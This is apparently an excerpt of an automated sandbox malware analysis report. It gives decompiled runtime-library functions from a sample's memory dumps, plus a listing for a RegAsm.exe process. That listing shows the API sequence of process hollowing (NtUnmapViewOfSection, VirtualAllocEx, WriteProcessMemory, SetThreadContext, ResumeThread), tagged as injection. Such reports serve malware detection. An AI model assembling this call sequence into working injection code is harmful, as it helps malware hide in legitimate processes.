0x00a38aa6
0x00a38ab8
0x00a38ab9
0x00000000
0x00a38abe
0x00a38a39
0x00a38a3b
0x00a38a3d
0x00a38a45
0x00a38a62
0x00a38a6d
0x00a38a6f
0x00a38a71
0x00000000
0x00000000
0x00a38a73
0x00a38a79
0x00a38a79
0x00000000
0x00a38a79
0x00a38a49
0x00a38a4d
0x00a38a52
0x00a38a56
0x00000000
0x00000000
0x00a38a58
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000000,00A360E1,00000000,00000000,?,?,00000000,?,00000001,?,?,00000001,00A360E1), ref: 00A38A15
__alloca_probe_16.LIBCMT ref: 00A38A4D
MultiByteToWideChar.KERNEL32(?,00000001,00000000,00A360E1,00000000,?), ref: 00A38A9E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A34ED7,?), ref: 00A38AB0
__freea.LIBCMT ref: 00A38AB9

Part of subcall function 00A34CDB: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A38A6C,00000000,?,?,00A34ED7,?,00000008,?,00A360E1,?,?), ref: 00A34D0D

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 14120d259dfa0416fc645ac3969b898e28389300b7d7a838a03b09f6fdb641eb
Instruction ID: db0f0c36165671a333b66b668f02141f9cca14234e8856c5f7a2a8b93698c857
Opcode Fuzzy Hash: 14120d259dfa0416fc645ac3969b898e28389300b7d7a838a03b09f6fdb641eb
Instruction Fuzzy Hash: ED31E272A00209AFDF25DFA4DC45DEF7BB9EB81791F45012AF804D6150EB399D94CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A38370, Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00A38370() {
				void* __ecx;
				void* __edi;
				void* _t6;
				int _t7;
				void* _t16;
				int _t18;
				void* _t20;
				char* _t27;
				WCHAR* _t29;
				void* _t31;
				void* _t32;

				_t31 = _t32;
				_push(GetEnvironmentStringsW());
				_pop(_t29);
				if(_t29 == 0) {
					L7:
					0 = 0;
				} else {
					_t6 = E00A38339();
					_t20 = _t29;
					_push(0);
					_push(0);
					_push(0);
					_t16 = _t6;
					_t18 = _t16 - _t29 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t29, _t18, 0, ??, ??, ??);
					 *(_t31 - 4) = _t7;
					_t8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t27 = E00A34CDB(_t20, 0, _t8);
						if(_t27 != 0 && WideCharToMultiByte(0, 0, _t29, _t18, _t27,  *(_t31 - 4), 0, 0) != 0) {
							_push(_t27);
							_pop(0);
							_t27 = 0;
						}
						E00A34CA1(_t27);
					}
				}
				if(_t29 != 0) {
					FreeEnvironmentStringsW(_t29);
				}
				return 0;
			}

0x00a38374
0x00a3837f
0x00a38380
0x00a38385
0x00a383dd
0x00a383de
0x00a38387
0x00a38388
0x00a3838d
0x00a3838e
0x00a3838f
0x00a38390
0x00a38392
0x00a38396
0x00a3839c
0x00a383a2
0x00a383a5
0x00a383a7
0x00000000
0x00a383a9
0x00a383b2
0x00a383b4
0x00a383cc
0x00a383cd
0x00a383ce
0x00a383ce
0x00a383d5
0x00a383da
0x00a383a7
0x00a383e1
0x00a383e4
0x00a383e4
0x00a383f2

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,00A3403D), ref: 00A38379
WideCharToMultiByte.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00A3403D), ref: 00A3839C

Part of subcall function 00A34CDB: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A38A6C,00000000,?,?,00A34ED7,?,00000008,?,00A360E1,?,?), ref: 00A34D0D

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00A383C2
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00A3403D), ref: 00A383E4

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
String ID:
API String ID: 1794362364-0
Opcode ID: abbc72f7c0d9c0d0fa21378e3a92fafd60433076a869ef4b80c0b9497f3d5bdd
Instruction ID: d5552384ee9ebac2c2ee3cd1e79dbc680bfdc653adb569cdae3df5e955c8a2ea
Opcode Fuzzy Hash: abbc72f7c0d9c0d0fa21378e3a92fafd60433076a869ef4b80c0b9497f3d5bdd
Instruction Fuzzy Hash: 3901D477502315BF63205BB67D8CCBB7E6CD9C3FA2710012AF804DA608DE668C468170

Uniqueness

Uniqueness Score: -1.00%

Function 00A322C3, Relevance: 6.1, APIs: 4, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00A322C3() {
				signed int _t13;
				signed int _t15;
				signed int _t21;
				WCHAR* _t22;
				signed int* _t28;
				void* _t31;
				void* _t32;
				void* _t35;
				void* _t36;

				_t35 = _t36;
				_t21 =  *(_t35 + 8);
				_t28 = 0xa4e758 + _t21 * 4;
				asm("lock cmpxchg [edi], ecx");
				_push(0);
				if(0 == 0) {
					_t22 =  *(0xa411dc + _t21 * 4);
					_push(LoadLibraryExW(_t22, 0, 0x800));
					_pop(_t31);
					_t32 = _t31;
					if(_t32 != 0) {
						L8:
						 *_t28 = _t32;
						if( *_t28 != 0) {
							FreeLibrary(_t32);
						}
						_t13 = _t32;
					} else {
						_t15 = GetLastError();
						if(_t15 == 0x57) {
							_t15 = LoadLibraryExW(_t22, _t32, _t32);
							_push(_t15);
							_pop(0);
						}
						_t32 = 0;
						if(0 != 0) {
							goto L8;
						} else {
							 *_t28 = _t15 | 0xffffffff;
							_t13 = 0;
						}
					}
				} else {
					asm("sbb eax, eax");
					_t13 =  ~0x00BADBAE & 0;
				}
				return _t13;
			}

0x00a322c5
0x00a322c7
0x00a322cf
0x00a322d6
0x00a322da
0x00a322de
0x00a322eb
0x00a32301
0x00a32302
0x00a32303
0x00a32305
0x00a3232e
0x00a32330
0x00a32334
0x00a32337
0x00a32337
0x00a3233d
0x00a32307
0x00a32307
0x00a32310
0x00a32315
0x00a3231b
0x00a3231c
0x00a3231c
0x00a32321
0x00a32323
0x00000000
0x00a32325
0x00a32328
0x00a3232a
0x00a3232a
0x00a32323
0x00a322e0
0x00a322e5
0x00a322e7
0x00a322e7
0x00a32343

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,00000FA0,00A4E73C,?,?,00A3226A,00000FA0,00A4E73C,00000000,?,?,00A3240F,00000008,InitializeCriticalSectionEx), ref: 00A322FB
GetLastError.KERNEL32(?,00A3226A,00000FA0,00A4E73C,00000000,?,?,00A3240F,00000008,InitializeCriticalSectionEx,00A412D0,InitializeCriticalSectionEx,00000000,?,00A321CE,00A4E73C), ref: 00A32307
LoadLibraryExW.KERNEL32(?,00000000,00000000,?,00A3226A,00000FA0,00A4E73C,00000000,?,?,00A3240F,00000008,InitializeCriticalSectionEx,00A412D0,InitializeCriticalSectionEx,00000000), ref: 00A32315

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 073e86f065d7b4371e030963c873d140b3b51637cf36355a6376061858a8daf5
Instruction ID: 50d0199e1260244ee6a7a066694bd680c309db0c028790e38003bf73485477c8
Opcode Fuzzy Hash: 073e86f065d7b4371e030963c873d140b3b51637cf36355a6376061858a8daf5
Instruction Fuzzy Hash: 7601FC3E3412266FDB228BF9EC49FA77B6CEF46761F500635F20AD9490CA259441C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A35453, Relevance: 6.1, APIs: 4, Instructions: 54
libraryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00A35453(signed int _a4) {
				signed int _t9;
				signed int _t11;
				signed int _t16;
				WCHAR* _t23;
				signed int _t25;
				signed int* _t26;
				void* _t29;
				void* _t31;

				_t9 = _a4;
				_t26 = 0xa4e930 + _t9 * 4;
				_t25 =  *_t26;
				if(_t25 == 0) {
					_t23 =  *(0xa41d78 + _t9 * 4);
					_t29 = LoadLibraryExW(_t23, 0, 0x800);
					if(_t29 != 0) {
						L8:
						_t11 = _t29;
						 *_t26 = _t11;
						if( *_t26 != 0) {
							FreeLibrary(_t29);
						}
						_push(_t29);
						_pop(0);
						L11:
						return 0;
					}
					_t16 = GetLastError();
					if(_t16 != 0x57) {
						_t31 = 0;
					} else {
						_t16 = LoadLibraryExW(_t23, _t29, _t29);
						_t31 = _t16;
					}
					_t29 = _t31;
					if(_t29 != 0) {
						goto L8;
					} else {
						 *_t26 = _t16 | 0xffffffff;
						goto L11;
					}
				}
				_t4 = _t25 + 1; // 0x4f268f79
				asm("sbb eax, eax");
				return  ~_t4 & _t25;
			}

0x00a35458
0x00a3545c
0x00a35463
0x00a35467
0x00a35475
0x00a3548d
0x00a3548f
0x00a354b8
0x00a354b9
0x00a354ba
0x00a354be
0x00a354c1
0x00a354c1
0x00a354c7
0x00a354c8
0x00a354c9
0x00000000
0x00a354ca
0x00a35491
0x00a3549a
0x00a354a9
0x00a3549c
0x00a3549f
0x00a354a5
0x00a354a5
0x00a354ab
0x00a354ad
0x00000000
0x00a354af
0x00a354b2
0x00000000
0x00a354b4
0x00a354ad
0x00a35469
0x00a3546e
0x00000000

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000000,?,00A353FA,?,00000000,00000000,?,?,00A355F7,00000006,FlsSetValue), ref: 00A35485
GetLastError.KERNEL32(?,00000000,00000800,?,?,00000000,?,00A353FA,?,00000000,00000000,?,?,00A355F7,00000006,FlsSetValue), ref: 00A35491
LoadLibraryExW.KERNEL32(?,00000000,00000000,?,00000000,00000800,?,?,00000000,?,00A353FA,?,00000000,00000000), ref: 00A3549F

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 4f435d399450b1e4eeac1b215b8337eaa91a146a95bd7f4a16910203edd6dc66
Instruction ID: ac71d90168de314564f9d30905c0993a7abcb6aea22c3a009781820dbc8f9a3f
Opcode Fuzzy Hash: 4f435d399450b1e4eeac1b215b8337eaa91a146a95bd7f4a16910203edd6dc66
Instruction Fuzzy Hash: B301D43AA51621BBCB25CBFCAC449A677A9AFC77B2F200621F549D3040C62198C1C6F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 6476 Parent PID: 6432 RegAsm.exeCOMMON

Executed Functions

Function 055AACC8, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL(?), ref: 055AACF6

Memory Dump Source

Source File: 00000001.00000002.609236249.00000000055A0000.00000040.00000001.sdmp, Offset: 055A0000, based on PE: false

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: e3362173ac6a3ae148927039b74636fcf8f5411511b7fbdc1a821caa1735c31e
Instruction ID: ae98cd0686dbc78806c9ebad5de41963f10e756e77f1f65c3035ea7c47cf8639
Opcode Fuzzy Hash: e3362173ac6a3ae148927039b74636fcf8f5411511b7fbdc1a821caa1735c31e
Instruction Fuzzy Hash: 60F05E32904359CFDB258B24C8087DDBBB1BB18308F2485C9D48DA6221C7718AC4CF10

Uniqueness

Uniqueness Score: -1.00%

Function 083F0408, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNELBASE(?,00000E90,?,?), ref: 083F049E

Memory Dump Source

Source File: 00000001.00000002.610041731.00000000083F0000.00000040.00000001.sdmp, Offset: 083F0000, based on PE: false

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: 08a36cc9b1d96e16e595c4d3bdf3b4a94a92ca10580ec075785888efe699ddf5
Instruction ID: 826a52796a017d875e32f5ca60a93ed10a437a843437188798dad7c28f146af0
Opcode Fuzzy Hash: 08a36cc9b1d96e16e595c4d3bdf3b4a94a92ca10580ec075785888efe699ddf5
Instruction Fuzzy Hash: 5E21B0714093806FD3128B25CC51F62BFB4EF87A20F0A81DBED849B653D264A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 083F0838, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 083F08AC

Memory Dump Source

Source File: 00000001.00000002.610041731.00000000083F0000.00000040.00000001.sdmp, Offset: 083F0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: b82da390948f84cb7d920aedc4fec811fc95918d5c2c85fc8f4bdf12afd4ef28
Instruction ID: 5c264266737dd9e632b57fffa218192a513a75d88c02004ce36404ab9388a77a
Opcode Fuzzy Hash: b82da390948f84cb7d920aedc4fec811fc95918d5c2c85fc8f4bdf12afd4ef28
Instruction Fuzzy Hash: 9E21A1765097C09FDB12CB25DC55792BFA4EF43220F0880EEED88CF253D265A908D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 083F077C, Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 083F07FC

Memory Dump Source

Source File: 00000001.00000002.610041731.00000000083F0000.00000040.00000001.sdmp, Offset: 083F0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c283fb40d46e166bd361d597e1bc35419f01f9feb94f75efbfeda3b1b0670c9c
Instruction ID: 6a1017e9b74bcead4b7c18dd6f8faf33f994487bac1e0e471f54c24a55f97f3a
Opcode Fuzzy Hash: c283fb40d46e166bd361d597e1bc35419f01f9feb94f75efbfeda3b1b0670c9c
Instruction Fuzzy Hash: DD210E760097C09FDB12CB24DC90A92FFF4EF07220F0980EEE9858B163D224A908DB61

Uniqueness

Uniqueness Score: -1.00%

Function 083F013B, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 083F01A6

Memory Dump Source

Source File: 00000001.00000002.610041731.00000000083F0000.00000040.00000001.sdmp, Offset: 083F0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6eb6567a812c6addceeeecb0e19cddd47b5d6750739d3e310060f14d4688d2b1
Instruction ID: 682e1c0bcec8eadf98b46ad31b5c50c5e33f9aba7533bf9bda9c349584df8639
Opcode Fuzzy Hash: 6eb6567a812c6addceeeecb0e19cddd47b5d6750739d3e310060f14d4688d2b1
Instruction Fuzzy Hash: AF11A271409780AFDB228F54DC44A62FFF4EF46210F0884DEEE898B153D275A518DB61

Uniqueness

Uniqueness Score: -1.00%

Function 083F06DB, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 083F0740

Memory Dump Source

Source File: 00000001.00000002.610041731.00000000083F0000.00000040.00000001.sdmp, Offset: 083F0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 162f41b82e9af53bd125dbe9201ed6cf5baeaca6333d934ad521a6b6db6e0af2
Instruction ID: 682331cd1d6d54277a6e036cf4fa46cfcc4d720d8fca6b61c61b30579e1369fc
Opcode Fuzzy Hash: 162f41b82e9af53bd125dbe9201ed6cf5baeaca6333d934ad521a6b6db6e0af2
Instruction Fuzzy Hash: E3110476409780AFDB228F25DC40A52FFB4EF16320F0880DEEE858B163C375A558DB61

Uniqueness

Uniqueness Score: -1.00%

Function 083F0634, Relevance: 1.6, APIs: 1, Instructions: 55threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 083F0693

Memory Dump Source

Source File: 00000001.00000002.610041731.00000000083F0000.00000040.00000001.sdmp, Offset: 083F0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 8b4c00f6a57fb4dfe92b8986437abc38d6c06b8c2f0401035dc134b10bf6b6d5
Instruction ID: 63fad71b00e7107029f261bde1925e65521f6fe224587f16ed6116ce0f06c3cb
Opcode Fuzzy Hash: 8b4c00f6a57fb4dfe92b8986437abc38d6c06b8c2f0401035dc134b10bf6b6d5
Instruction Fuzzy Hash: 8911BF755053849FD715CB15DC85A52BFE8EF46221F0880AEED458B262D278E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 083F07B6, Relevance: 1.5, APIs: 1, Instructions: 47injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 083F07FC

Memory Dump Source

Source File: 00000001.00000002.610041731.00000000083F0000.00000040.00000001.sdmp, Offset: 083F0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c4a6fad1e5c45de4789f47b2786e61739eb51d310d18f928bbfa3c0b0fb312d1
Instruction ID: f8ba45b21eebbbc5e687818c5f5c9c92008f9bfbe1ea7d3850f478a506e4fef8
Opcode Fuzzy Hash: c4a6fad1e5c45de4789f47b2786e61739eb51d310d18f928bbfa3c0b0fb312d1
Instruction Fuzzy Hash: B5015B35500A04DFDB24CF19D884B66FBE4EF44621F0880AEDE4A8B662D375E558DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 083F0872, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 083F08AC

Memory Dump Source

Source File: 00000001.00000002.610041731.00000000083F0000.00000040.00000001.sdmp, Offset: 083F0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: ed4edb0ddaae817b3b1143b99bc56e54f1e7a102e3188a2c36dc92128156a659
Instruction ID: 1d76421e355e7120d6ab31d71ff19f559f4384fbe67a70c346ca615e39d10c36
Opcode Fuzzy Hash: ed4edb0ddaae817b3b1143b99bc56e54f1e7a102e3188a2c36dc92128156a659
Instruction Fuzzy Hash: 46019E71A00600DFDB14DF29D885766BBD8EF40621F0880BADE49DB647E6B4E404CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 083F044E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNELBASE(?,00000E90,?,?), ref: 083F049E

Memory Dump Source

Source File: 00000001.00000002.610041731.00000000083F0000.00000040.00000001.sdmp, Offset: 083F0000, based on PE: false

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: d760af635b64883acf015b265d186dcd05935cd6f0195a51deb88faace75f61a
Instruction ID: 7d61b7a7517a1e1aabbe54ce0c5942aeee77ae475688ab94553edb6dbff269b1
Opcode Fuzzy Hash: d760af635b64883acf015b265d186dcd05935cd6f0195a51deb88faace75f61a
Instruction Fuzzy Hash: 1E015E76940600AFD610DF16DC86F26FBA8FB84A20F14816AED089B741E271B515CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 083F0162, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 083F01A6

Memory Dump Source

Source File: 00000001.00000002.610041731.00000000083F0000.00000040.00000001.sdmp, Offset: 083F0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b3c6989c29c17e68ca0afffcf7660ef39ae6c1ca62facc35cd120e53ed262ff6
Instruction ID: 78a66dbba244ef2a36e88aced12b3b33c1e0d3656af069fc6f07c8b60db7d86b
Opcode Fuzzy Hash: b3c6989c29c17e68ca0afffcf7660ef39ae6c1ca62facc35cd120e53ed262ff6
Instruction Fuzzy Hash: 1D016135400700DFDB218F55D845B56FFE4EF48311F08C9AAEE495B612D375A514DB61

Uniqueness

Uniqueness Score: -1.00%

Function 083F0656, Relevance: 1.5, APIs: 1, Instructions: 44threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 083F0693

Memory Dump Source

Source File: 00000001.00000002.610041731.00000000083F0000.00000040.00000001.sdmp, Offset: 083F0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 6fe651e9043ca15512282d69636f9e030cff246edf88e4656c1a6e4d8456a280
Instruction ID: 4bc8486cf7f37628f8fded5274945c39d7d642f2e15045c1aa3316b2a1d3745b
Opcode Fuzzy Hash: 6fe651e9043ca15512282d69636f9e030cff246edf88e4656c1a6e4d8456a280
Instruction Fuzzy Hash: 0B01B175600600DFDB14CF19D884B62FBE4EF84221F08C0AADE498B653D7B9E408CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 083F0702, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 083F0740

Memory Dump Source

Source File: 00000001.00000002.610041731.00000000083F0000.00000040.00000001.sdmp, Offset: 083F0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5b09500965b2d6dd27f9dc23c967e5ddcd015f7efa585abf3bddd2a616cb6b5b
Instruction ID: dbaa22df625e5daac742ced88ce2c7d4495104c893cf73cf4d9433a4181e7d71
Opcode Fuzzy Hash: 5b09500965b2d6dd27f9dc23c967e5ddcd015f7efa585abf3bddd2a616cb6b5b
Instruction Fuzzy Hash: 2D019235500B00DFDB248F19D845B56FFA4EF54321F0880AEDE4A4B612D371A458DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 055AAE9D, Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?), ref: 055AAED8

Memory Dump Source

Source File: 00000001.00000002.609236249.00000000055A0000.00000040.00000001.sdmp, Offset: 055A0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c68599aa680fefb69d7f886a139b9330ab91ac9e1c08ad47910d02000ffaaa63
Instruction ID: 15a798827441c83d326edacb0e29043d45ca9fd3b6b840479ffeab83b46fb460
Opcode Fuzzy Hash: c68599aa680fefb69d7f886a139b9330ab91ac9e1c08ad47910d02000ffaaa63
Instruction Fuzzy Hash: D2F05832940258EFCB268B64C849BDCBFB1BB1C304F1440C9E60DAA2A2C7B14AC0DF10

Uniqueness

Uniqueness Score: -1.00%

Function 055AAFD5, Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 055AAFFD

Memory Dump Source

Source File: 00000001.00000002.609236249.00000000055A0000.00000040.00000001.sdmp, Offset: 055A0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a3326a20811960a951b1cea8e9a660867ba556ed88f4742afed67772333d3930
Instruction ID: 5ac1bc8ae8c6b51bfe819864577600b0976099cc2ccc7f1299bbdb3a7cf8b32a
Opcode Fuzzy Hash: a3326a20811960a951b1cea8e9a660867ba556ed88f4742afed67772333d3930
Instruction Fuzzy Hash: 78F03036404254CFCB258B68D8487DDBBB07B0C324F1406C9E52DA7291C7B559C4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 01200743, Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd386e4fc9bd86c25a56a01589bad364fbff7a6618fc166e39b0e350a39ff33a
Instruction ID: e54fbf44d538764fe57c6aa94e08cff9f6257ed6c503dc973a3ad110272758cb
Opcode Fuzzy Hash: fd386e4fc9bd86c25a56a01589bad364fbff7a6618fc166e39b0e350a39ff33a
Instruction Fuzzy Hash: 0441167255E7C09FE7138B248CA17917FB0AF53250F0A45DBE884CF5A3D22C5809CB62

Uniqueness

Uniqueness Score: -1.00%

Function 012008B1, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 620e94db44d60c6c0ad83431fd957824207ccc590e352bd6e69cc152cc7b3409
Instruction ID: 8c8d6b0e99d09b0edf99b7b38d6eac37476904bdb3caf7d9881eec0cc0cc5f50
Opcode Fuzzy Hash: 620e94db44d60c6c0ad83431fd957824207ccc590e352bd6e69cc152cc7b3409
Instruction Fuzzy Hash: EB315C7240E7C44FE7138B258C91B62BFB4EB43654F0981DBE988CF193D2289809CB62

Uniqueness

Uniqueness Score: -1.00%

Function 08291EC3, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.610014835.0000000008290000.00000040.00000001.sdmp, Offset: 08290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5e5c8b3aaac7acad47ea10c3a38ec53a9c7a61a07a43a6f77026070435a850f
Instruction ID: e40f079991f20c98521c2f08b525a724d3b7c3f45ddc87d53225993a919345d7
Opcode Fuzzy Hash: b5e5c8b3aaac7acad47ea10c3a38ec53a9c7a61a07a43a6f77026070435a850f
Instruction Fuzzy Hash: 9A313CB5508341AFD341CF19DC41A5AFFE4EF89660F04896EF888D7311D275AA188BA2

Uniqueness

Uniqueness Score: -1.00%

Function 01200774, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25810c2d869e0028676cabcdeac4142eaf62b853eb77eb4210d6334d266e697e
Instruction ID: 22bf58c618ac83ac6febbf709ff123756c5c0dfa707b648b3f44744c9a2e8c50
Opcode Fuzzy Hash: 25810c2d869e0028676cabcdeac4142eaf62b853eb77eb4210d6334d266e697e
Instruction Fuzzy Hash: 642180715193809FE3138B19DC90B62BFE4EF46250F09859AED85CB693C239A904CB62

Uniqueness

Uniqueness Score: -1.00%

Function 012008F0, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f99a63bdae31ff63f2ed0e799ddc26e0e3293f455ea5ff51fffc92c400bb85c5
Instruction ID: 0a65f5a22e92c01f157a341dfda6e1fd7f3a61149f2d0c8c5710aaa5ef6019e4
Opcode Fuzzy Hash: f99a63bdae31ff63f2ed0e799ddc26e0e3293f455ea5ff51fffc92c400bb85c5
Instruction Fuzzy Hash: 1621A1764097C49FE713CB15DC81B62BFB4EB43754F0985DAED898F153D2299804CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01200B47, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4f205f124300a4a2582bf0fc9a63357c1db012f8840fcce1c6e0ab891e1f518
Instruction ID: 39a87476694cfa721b88cda261585428469bb2b1737ee58460ecc238772d9dbe
Opcode Fuzzy Hash: d4f205f124300a4a2582bf0fc9a63357c1db012f8840fcce1c6e0ab891e1f518
Instruction Fuzzy Hash: A7217C3115D7C18FD703CB24C8A4B557FB1AF57208F2986EEE4888B5A3D33A9806CB52

Uniqueness

Uniqueness Score: -1.00%

Function 012008B5, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72484f2107ba8316333bf3dda80dee1bd6df260d4424d559e6fc14eb3faf8fde
